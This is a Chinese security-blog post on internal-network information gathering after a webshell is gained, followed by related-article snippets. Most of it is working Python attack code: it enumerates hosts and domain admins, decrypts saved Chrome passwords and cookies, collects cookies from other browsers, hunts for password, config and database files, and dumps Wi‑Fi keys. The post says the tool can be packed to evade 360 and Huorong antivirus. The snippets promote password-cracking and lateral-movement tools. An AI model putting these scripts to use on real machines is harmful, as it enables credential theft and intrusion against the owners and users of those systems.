内网信息收集(附脚本)

2023-11-06

——D&X安全实验室


文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo

可打包为可执行文件,可过360、火绒等


        渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。

        当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:

当前用户:

  whoami /all

网络信息:

  ipconfig /all

计算机版本/补丁编号:

  systeminfo

进程列表:

  tasklist

补丁信息:

  wmic qfe

系统信息:

  wmic os

机器运行信息:

  net statistics workstation

系统架构:

  set process

防火墙配置:

  netsh firewall show config

日志修改权限:

  wmic nteventlog get path,filename,writeable

当前在线用户:

  quser

本地用户:

  net user

本机管理员:

  net localgroup administrators

已安装软件信息:

  wmic product get name,version

杀软信息:

  WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe

端口信息:

  netstat -ano

路由信息:

  route print

arp信息:

  arp -a

host信息:

  type c:\Windows\system32\drivers\etc\hosts

wifi密码:

  netsh wlan show profile

计划任务:

  schtasks

自启服务:

  wmic startup get command, caption

已启服务:

  net start

本机服务:

  wmic service list brief

DNS服务器:

  nslookup

DNS缓存:

  ipconfig /displaydns

当前域信息:

  net config workstation

当前连接:

  net use

当前映射:

  net share

域环境:

  net view

定位域控:

  net group "domain controllers" /domain

域用户:

  net user /domain

域用户详情:

  wmic useraccount get /all

域用户密码策略:

  net accounts /domain

本地用户组信息:

  net localgroup

域用户组信息:

  net group /domain

域用户组成员:

  net "Domain users" /domain

域管理员用户组成员:

  net group "Enterprise Admins" /domain

域信任信息:

  nltest /domain_trusts

        以下脚本可用于辅助获取:

import os,sys
import csv

cmdList={
    #主机类
    "当前用户":"whoami /all",
    "网络信息":"ipconfig /all",
    "计算机版本/补丁编号":"systeminfo",
    "进程列表":"tasklist",
    "补丁信息":"wmic qfe",
    "系统信息":"wmic os",
    "机器运行信息":"net statistics workstation",
    "系统架构":"set process",
    "防火墙配置":"netsh firewall show config",
    "日志修改权限":"wmic nteventlog get path,filename,writeable",
    "当前在线用户":"quser",
    "本地用户":"net user",
    "本机管理员":"net localgroup administrators",
    "已安装软件信息":"wmic product get name,version",
    #杀软类
    "杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe",
    #网络类
    "端口信息":"netstat -ano",
    "路由信息":"route print",
    "arp信息":"arp -a",
    "host信息":"type c:\Windows\system32\drivers\etc\hosts",
    "wifi密码":"netsh wlan show profile",
    #计划任务类
    "计划任务":"schtasks",
    #服务类
    "自启服务":"wmic startup get command, caption",
    "已启服务":"net start",
    "本机服务":"wmic service list brief",
    #DNS服务
    "DNS服务器":"nslookup",
    "DNS缓存":"ipconfig /displaydns",
    "DNS服务器":"nslookup",
    #域信息
    "当前域信息":"net config workstation",
    "当前连接":"net use",
    "当前映射":"net share",
    "域环境":"net view",
    "定位域控":"net time",
    "定位域控":"net group \"domain controllers\" /domain",
    "域用户":"net user /domain",
    "域用户详情":"wmic useraccount get /all ",
    "域用户密码策略":"net accounts /domain",
    "本地用户组信息":"net localgroup",
    "域用户组信息":"net group /domain",
    "域用户组成员":"net \"Domain users\" /domain",
    "域管理员用户组成员":"net group \"Domain Admins\" /domain",
    "域管理员用户组成员":"net group \"Enterprise Admins\" /domain",
    "域信任信息":"nltest /domain_trusts",
}
choseList={}
    
def main():
    #可添加选择性执行,对应数据丢入choseList再执行
    #以下默认全部执行
    id=0
    for key,value in cmdList.items():
        id=id+1
        print('\n\n-------------%s-------------'%key)
        message = os.popen(value).read()
        print(message)
        csv_writer.writerow([ id, key, message])
    
if __name__ == "__main__":
    filename='./Result/hostInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','类型', '信息'])
        main()

 

        在我们内网渗透过程中没有头绪时,我们往往能通过一些出其不意的方式来获取一些渗透路径。

        通过获取浏览器书签、记录等信息来获取更多未知可渗透网络,通过获取浏览器Cookie以及存储的账号密码来获取Web端权限。以下脚本可用于辅助获取:

import os,sys
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import  datetime, timedelta
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import browser_cookie3
import requests
import csv

#初始化地址
if 'win' in sys.platform:
    BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Bookmarks') # 存在保存的书签
    localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# 存在AES加密密钥
    loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# 存在保存的页面账号密码
    cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# 存在cookie
elif 'linux' in sys.platform:
    BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/.config/google-chrome/Local State')
    loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data')
    cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies')
else:#Mac
    BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks')
    localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State')
    loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data')
    cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies')


def getChromeTime(chromedate):  # 转换时间
    try:
        return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate))
    except:
        return ''

def getEncKey():    # 获取加密AESkey
    with open(localStatePath, "r", encoding="utf-8") as f:
        localStateTest = f.read()
        localState = json.loads(localStateTest)
    key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:]
    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

#Chrome专属,可删除使用公用方法
def getDecCookie(encCookie):    # 获取解密后的Cookie
    if sys.platform == 'win32':
        try:
            if encCookie[:4] == b'x01x00x00x00':
                decCookie = dpapiDecrypt(encCookie)
                return decCookie.decode()
            elif encCookie[:3] == b'v10':
                decCookie = aesDecrypt(encCookie)
                return decCookie[:-16].decode()
        except WindowsError:
            return None
    else:
        raise WindowsError

#Chrome专属,可删除使用公用方法
def dpapiDecrypt(encCookie):   # 使用DPAPI解密
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encCookie, len(encCookie))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result

#Chrome专属,可删除使用公用方法    
def aesDecrypt(encCookie):  # 使用AESkay解密
    key = getEncKey()
    nonce = encCookie[3:15]
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(encCookie[15:])

def decPassword(password, key): # 解密密码
    try:
        iv = password[3:15]
        password = password[15:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return ""

def getPassword():  # 获取密码
    csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间'])
    key = getEncKey()
    filename = "chromeLoginData.db"
    # 创建新chrome数据库文件,防止正在运行导致数据库锁定
    shutil.copyfile(loginDataPath, filename)
    db = sqlite3.connect(filename)
    db.text_factory = str
    cursor = db.cursor()
    cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created")
    id=0
    for row in cursor.fetchall():
        url = row[0]
        username = row[1]
        password = decPassword(row[2], key)
        dateLastUsed = row[3]        
        if username or password:
            id=id+1
            print("\nURL: "+url)
            print("Username: "+username)
            print("Password: "+password)
            print("Last Used: "+getChromeTime(dateLastUsed))
            csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)])
        else:
            continue
    cursor.close()
    db.close()
    csv_writer.writerow(' ')
    try:
        os.remove(filename)
    except:
        pass

def formatCookiejar(cookiejar):  # 格式化cookiejar对象并打印
    cookieList = str(cookiejar)[12:-3].split(">, <")
    newCookieList=[]
    id=0
    for i in range(len(cookieList)):
        id=id+1
        host=cookieList[i].split(" for ")[1]
        name=cookieList[i].split("Cookie ")[1].split("=")[0]
        cookie=cookieList[i].split("=")[1].split(" for ")[0]
        print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie))
        csv_writer.writerow([ id, host, name, cookie])

def getCookie():    # 获取cookie
    try:
        chromeCookie = browser_cookie3.chrome()
        print('\n\n-------------Chrome浏览器Cookie如下:-------------')
        getChromeCookie()
    except:
        try:
            csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie'])
            formatCookiejar(chromeCookie)
            csv_writer.writerow(' ')
        except:
            chromeCookie = []
            csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' '])
            csv_writer.writerow(' ')
            print('\n未检测到Chrome浏览器')
    try:
        firefoxCookie = browser_cookie3.firefox()
        csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Firefox浏览器Cookie如下:-------------')
        formatCookiejar(firefoxCookie)
        csv_writer.writerow(' ')
    except:
        firefoxCookie = []
        csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Firefox浏览器')
    try:
        operaCookie =  browser_cookie3.opera()
        csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Opera浏览器Cookie如下:-------------')
        formatCookiejar(operaCookie)
        csv_writer.writerow(' ')
    except:
        operaCookie = []
        csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Opera浏览器')
    try:
        edgeCookie =  browser_cookie3.edge()
        csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Edge浏览器Cookie如下:-------------')
        formatCookiejar(edgeCookie)
        csv_writer.writerow(' ')
    except:
        edgeCookie = []
        csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Edge浏览器')
    try:
        chromiumCookie =  browser_cookie3.chromium()
        csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie'])
        print('\n\n-------------Chromium浏览器Cookie如下:-------------')
        formatCookiejar(chromiumCookie)
        csv_writer.writerow(' ')
    except:
        chromiumCookie = []
        csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' '])
        csv_writer.writerow(' ')
        print('\n未检测到Chromium浏览器')

#Chrome专属,可删除使用公用方法
def getChromeCookie():    # 获取cookie
    filename = "chromeCookieData.db"
    shutil.copyfile(cookiesPath, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")#需新版sqlite3,否则会报错encrypted_value无法转utf-8
    csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期'])
    id=0
    for row in cursor.fetchall():
        try:
            host = row[0]
            path = row[1]
            name = row[2]
            encrypted_value = row[3]
            expires_utc =getChromeTime(row[4])
            if  encrypted_value:
                id=id+1
                print("\nHost: "+host)
                print("Path: "+path)
                print("Name: "+name)
                try:
                    cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # Chrome80.X版本前解密方式
                except Exception as e:
                    cookie=getDecCookie(encrypted_value) # Chrome80.X版本后解密方式
                print("Cookie: "+cookie)
                print("Expires: "+expires_utc)
                csv_writer.writerow([ id, host, path, name, cookie, expires_utc])
        except:
            continue
    cursor.close()
    db.close()
    csv_writer.writerow(' ')
    try:
        os.remove(filename)
    except:
        pass

def forBookmarks(itemData,id): # 循环书签数据
    for item in itemData:
        type = item['type']
        name = item['name']
        if type == 'url':
            id = id+1
            print('\nTitle: ',name, '\nUrl: ',item['url'])
            csv_writer.writerow([ id,name,item['url']])
        else:   # 文件夹
            forBookmarks(item['children'],id)


def getBookmarks(): # 获取书签
    csv_writer.writerow([ 'ID','【Chrome】书签名', 'url地址'])
    with open(BookmarksPath, 'r',encoding = "utf-8") as f:
        itemData=json.loads(f.read())['roots']['bookmark_bar']['children']
    id=0
    forBookmarks(itemData,id)
    csv_writer.writerow(' ')
    

def main():
    print('\n-------------Chrome浏览器书签如下:-------------')
    getBookmarks()
    
    print('\n\n-------------Chrome浏览器密码如下:-------------')
    getPassword()
    print('\n\n-------------各浏览器Cookie如下:-------------')
    getCookie()
    
if __name__ == "__main__":
    filename='./Result/bowserInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        main()

 

        通过遍历获取敏感文件,或者聊天文件,有可能存在Web控制台账号密码等敏感信息。以下脚本可用来辅助获取:

import os,sys
import csv

cmdList={
    "QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."',
    "微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."',
    "下载文件":'dir /a /s /b "C:/Users/Administrator/Downloads"',
    "office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"',
    "sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"',
    "虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"',
    "outlook电子邮件文件":'c: & dir /a /s /b "*.eml"',
    "outlook数据库文件":'c: & dir /a /s /b "*.pst"',
    "配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"',
    "备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"',
    "密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"',
    "密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"',
    #"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"',
    #"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"',
}
choseList={}
    
def main():
    #可添加选择性执行,对应数据丢入choseList再执行
    #以下默认全部执行
    #第一次运行比较慢,正常
    id=0
    for key,value in cmdList.items():
        id = id + 1
        print('\n\n-------------%s-------------'%key)
        message = os.popen(value).read()
        print(message)
        csv_writer.writerow([ id, key, message])
    #可以添加选择性读取某文件---我有。懒

if __name__ == "__main__":
    filename='./Result/sensitiveFile.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','类型', '路径'])
        main()

  

        通过获取Wifi账号密码,获得的足够多的密码样本来分析密码设置方式和使用习惯,从而进行针对性的攻击利用。以下脚本可用来辅助获取:

import os
import importlib,sys
import csv
importlib.reload(sys)
 
 
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
    list = []
    # 获取所有的wifi名称
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中,请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")

        if result.find(u"所有用户配置文件 : ") != -1:
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except:
                per_wifi = []
            
            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")
 
                if passwd.find(u"关键内容            :") != -1:# 密码字符串不为空时
                    if passwd[18:] != '':
                        list_temp = []
                        list_temp.append(result[11:])
                        list_temp.append(passwd[18:])
                        list.append(list_temp)
    return list

if __name__ == "__main__":
    list = checkWIFI()
    print("返回结果如下:")
    filename='./Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow([ 'ID','wifi名称', '密码'])
        i = 0
        for j in list:
            i = i + 1
            print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
            csv_writer.writerow([ i, j[0], j[1]])

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

内网信息收集(附脚本) 的相关文章

  • NB!更方便Xshell本地密码破解工具

    工具介绍 XshellCrack是基于SharpXDecrypt的二次开发 用go语言重写 增加了注册表查询设置 更方便xshell本地密码破解 关注 Hack分享吧 公众号 回复关键字 230717 获取下载链接 工具使用 Usage r
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 横向移动 利用方式一 wmic命令 利用方式一 cscript 利用方式一 impacket SMB协议 横向移动 利用方式一 psexec 利用方式二 ps
  • 学习君github

    一 冰蝎 https github com rebeyond Behinder 源代码审计漏洞 白盒测试的各种漏洞风险描述或具体修复方案 https github com wooyunwang Fortify Golang 100天从新手到
  • 【端口转发】内网端口转发

    0x001 lcx使用 1 肉鸡上执行 lcx exe slave 公网 ip 端口 肉鸡 ip 端口 例如 lcx exe slave xxx xxx xxx xxx 10000 127 0 0 1 3389 意思是把肉鸡的 3389 端
  • 域名反查、权重查询以及ICP备案查询——ipInfoSearch

    域名反查 权重查询以及ICP备案查询 ipInfoSearch ipInfoSearch 一 配置需要python三方包 二 基本用法 三 多线程用法 文中工具已上传至github https github com Potato py ip
  • Skeleton Key(万能密码)与 Hook PasswordChangeNotify

    1 Skeleton Key 使用Skeleton Key 万能密码 可以对域内权限进行持久化操作 Skeleton Key特点 Skeleton Key被安装在64位域控服务器上 支持Windows Server2003 Windows
  • Apereo CAS反序列化漏洞中数据加解密研究

    Apereo CAS反序列化漏洞中数据加解密研究 0x01 简介 0x02 网上获取资料 0x03 初步运行失败 1 分析 2 Tips 0x04 分析原因 1 自己写解密算法 直接使用cas工程的相关jar包 java文件 调用解密函数
  • web目录扫描工具dirscan

    成果 在扫描之前 我们首先要对url进行整理 因为我使用的是requests模块 所以我的url要用http 开头 所以我的判断代码是 if url startswith http url url elif url startswith h
  • ATK&CK红队评估实战靶场(一)

    ATK CK红队评估实战靶场 一 的搭建和模拟攻击过程全过程 回到顶部 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境 靶机下载地址如下 http vulnstack qiyuanxuetang net vuln detai
  • 内网信息收集(附脚本)

    D X安全实验室 文中脚本已上传至github https github com Potato py getIntrInfo 可打包为可执行文件 可过360 火绒等 渗透的本质就是信息收集 信息收集的深度与广度以及对关键信息的提取 影响了后
  • burp如何设置微信小程序代理

    一 简介 没有废话 测试app 小程序 不知道怎么弄代理就看这个 算了 毕竟是自己的博客 还是先吐槽几句 我是小白一个 不知道怎么测app 最凄凉的连怎么代理都不知道 mmp 那老子百度把 行 第一次 夜神模拟器 搞一搞 看了不错的文章 写
  • win10下web漏洞扫描工具:AWVS安装教程

    01 AWVS安装 windows上安装其实很简单 以安装AWVS12版本为例子 具体步骤如下 01 双击exe安装 02 点击 Next 03 选择我同意 04 设置用户名和密码 这里用户名是以邮箱为准的 密码需要复杂点 不然会提示密码太
  • CTFshow 信息收集 web 6 7 8 9 10

    目录 第六关 提示 flag 第七关 提示 知识点 flag 第八关 提示 知识点 flag 第九关 提示 知识点 flag 第十关 提示 flag 第六关 提示 解压源码到当前目录 测试正常 收工 这道题考的是备份文件www zip 根据
  • 社工库网址与制作方法

    将互联网泄露的信息汇聚成数据库 简单说 黑客数据库 中国执行信息公开网 http zxgk court gov cn dt dapp 1 全国标准信息公共服务平台 http std samr gov cn 征信中心 https ipcrs
  • 在线检测本机ip的网站

    https www ip cn http www cip cc https tool lu ip http www ip138 com http www net cn static customercare yourip asp
  • Windows7之天镜漏洞扫描工具安装

    01 天镜漏洞扫描工具安装 01 安装天镜 02 升级漏洞 03 重启win7 多次重复升级过程 1次可能没办法成功 04 成功之后查看版本
  • 信息收集-服务器信息

    服务器上面可以运行大量的系统服务和第三方应用服务 如果操作系统或者第三方软件没有及时升级打补丁 攻击者就有可能直接通过服务器上运行的服务进行攻击 服务器需要收集的信息包含三个方面 操作系统信息等识别 waf Web应用程序防火墙 CMS 内
  • mimikatz

    https blog gentilkiwi com mimikatz https github com ParrotSec mimikatz
  • 使用cs与msf进行内网横向移动

    使用cs与msf进行内网横向移动 目标系统为 192 168 1 123 跳板主机为 192 168 1 118 一 使用cs探测内网 1 将目标上线至CS 2 使用cs探测内网信息 查看当前目标系统网络情况 确认目标系统所在内网网段 3
  • 内网渗透工具-反向代理nps使用分析

    0x1 简介 nps 是一款轻量级 高性能 功能强大的内网穿透代理服务器 支持 tcp udp 流量转发 可在网页上配置和管理各个tcp udp隧道 内网站点代理 http https解析等 功能强大 操作方便 0x2 前期准备 1 安装编

随机推荐

  • 【Leetcode】P5612 从仓库到码头运输箱子

    Leetcode P5612 从仓库到码头运输箱子 你有一辆货运卡车 你需要用这一辆车把一些箱子从仓库运送到码头 这辆卡车每次运输有 箱子数目的限制 和 总重量的限制 给你一个箱子数组 boxes 和三个整数 portsCount maxB
  • es 局部更新 DSL 语句

    curl XPOST 192 168 1 47 9200 sub refresh 更新 根据条件 curl XPOST 192 168 1 4 9200 sub update by query pretty H Content Type a
  • 02-07GRE真题及答案解析整理

    02 07年GRE真题及答案解析整理 2002年11月23日GRE笔考题 VERBAL部分 Section 1 填空 1 Although she gives badly titles to her musical compositions
  • std::match_result

    英文文档 https cplusplus com reference regex match results 以下是我对此英文文档的翻译 经过一定的加工 改动和取舍 并添加了我自己的理解 可能翻译的比较差 请轻喷 有空我会更新的 match
  • 数据库的添加与查询

    创建数据库 使用数据库 创表 添加数据 1 查询所有学生的信息 2 查询姓名是李白的学生信息 3 查询1班是上海的学生 4 查询家乡是北京或者上海的学生 5 查询小乔的年龄 6 查询家乡不在北京的学生 7 查询年龄小于20的女同学 8 查询
  • Obsidian 从本地到云端

    原文 https www ftls xyz posts obcsapi fc simple 作者 恐咖兵糖 Obsidian 从本地到云端 Obsidian 作为本地笔记软件 在使用了多端同步插件 remotely save插件情况下 我选
  • Flask类视图的使用

    1 add url rule函数 之前我们接触的视图都是函数 所以一般简称视图函数 其实视图也可以基于类来实现 类视图的好处是支持继承 但是类视图不能跟函数视图一样 写完类视图还需要通过app add url rule 函数来进行注册 ap
  • Python如何自动操作电脑桌面应用程序

    前言 本文是该专栏的第2篇 后面会持续分享python的各种黑科技知识 值得关注 熟悉python的朋友 都知道python可以做自动化 比如说selenium pyppeteer airtest等等 但你是否听说过python可以来自动操
  • Office 365 官方原版镜像下载

    中文说明 专业增强版 简体中文版 文件名称 O365ProPlusRetail img 下载地址 https officecdn microsoft com db 492350F6 3A01 4F97 B9C0 C7C6DDF67D60 m
  • “M OP N“ 数值问题

    M OP N 数值问题 问题描述 获得用户输入的一个字符串 格式为 M OP N 其中 M和N是任何数字 OP代表一种操作 表示为如下四种 加减乘除 根据OP 输出M OP N的运算结果 统一保存小数点后2位 注意 M和OP OP和N之间可
  • 腾讯AI Lab开源大规模高质量中文词向量数据,800万中文词随你用

    感谢阅读腾讯AI Lab第45篇文章 本文将介绍大规模高质量的中文词向量数据的开源情况 今日 腾讯AI Lab 宣布开源大规模 高质量的中文词向量数据 该数据包含800多万中文词汇 相比现有的公开数据 在覆盖率 新鲜度及准确性上大幅提高 为
  • 第八章 坐标系统变换

    一 使用QPainter绘图 http blog csdn net hellozex article details 78361311 二 坐标系统变换 在QPainter的默认坐标系中 点 0 0 位于坐标绘制设备的左上角 x坐标向右 y
  • 为什么http协议需要服务器,http协议、web服务器、并发服务器(上)

    1 HTTP格式 每个HTTP请求和响应都遵循相同的格式 一个HTTP包含Header和Body两部分 其中Body是可选的 HTTP协议是一种文本协议 所以 它的格式也非常简单 1 1 HTTP GET请求的格式 GET path HTT
  • 网络安全专业名词解释

    1 Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具 它采用自动测试和半自动测试的方式 通过拦截HTTP HTTPS的Web数据包 充当浏览器和相关应用程序的中间人 进行拦截 修改 重放数据包进行测试 是Web安全人员
  • Linux 互斥锁 递归锁 自旋锁 读写锁

    在多线程中 我们经常会要用到锁 那么 锁是什么 我们为什么要用到锁 回到问题的本质 我们在什么场景下会用到锁 锁是针对程序中的临界资源 也就是公共资源的 当我们有两个或多个线程同时对一个临界资源操作的时候 为了保证共享数据操作的完整性 我们
  • JSP中EL表达式的取值

    EL表达式可以取JavaBean的值 也可以取Attribute的值 下面是取Attribute的值
  • 计算属性结构

    一 计算属性的基本结构 计算属性 可以在里面写一些计算逻辑的属性 而是经过一系列计算之后再返回结果 他不像普通函数那样直接返回结果 而是经过一系列计算之后再返回结果 同时只要在它当中应用了data中的某个属性 当这个属性发生变化时 计算属性
  • 合宙Luat

    武侠小说中 主人公之所以能纵横江湖 常常离不开一样可遇不可求的绝世法宝 武功秘籍 如今勇于尝试的开发者 笃定地告诉后来者 选Luat二次开发 就如同拥有了物联网开发的武功秘籍 本期让我们通过 射雕英雄传 的一些小场景 聊聊LuaTask延时
  • 未在本地计算机上注册“Microsoft.ACE.OLEDB.12.0”提供程序

    错误信息 未在本地计算机上注册 microsoft ACE oledb 12 0 提供程序 在往SQL Server数据库中导入excel表数据的时候遇到的 原因就是 office system文件和非office 应用程序之间传输数据 解
  • 内网信息收集(附脚本)

    D X安全实验室 文中脚本已上传至github https github com Potato py getIntrInfo 可打包为可执行文件 可过360 火绒等 渗透的本质就是信息收集 信息收集的深度与广度以及对关键信息的提取 影响了后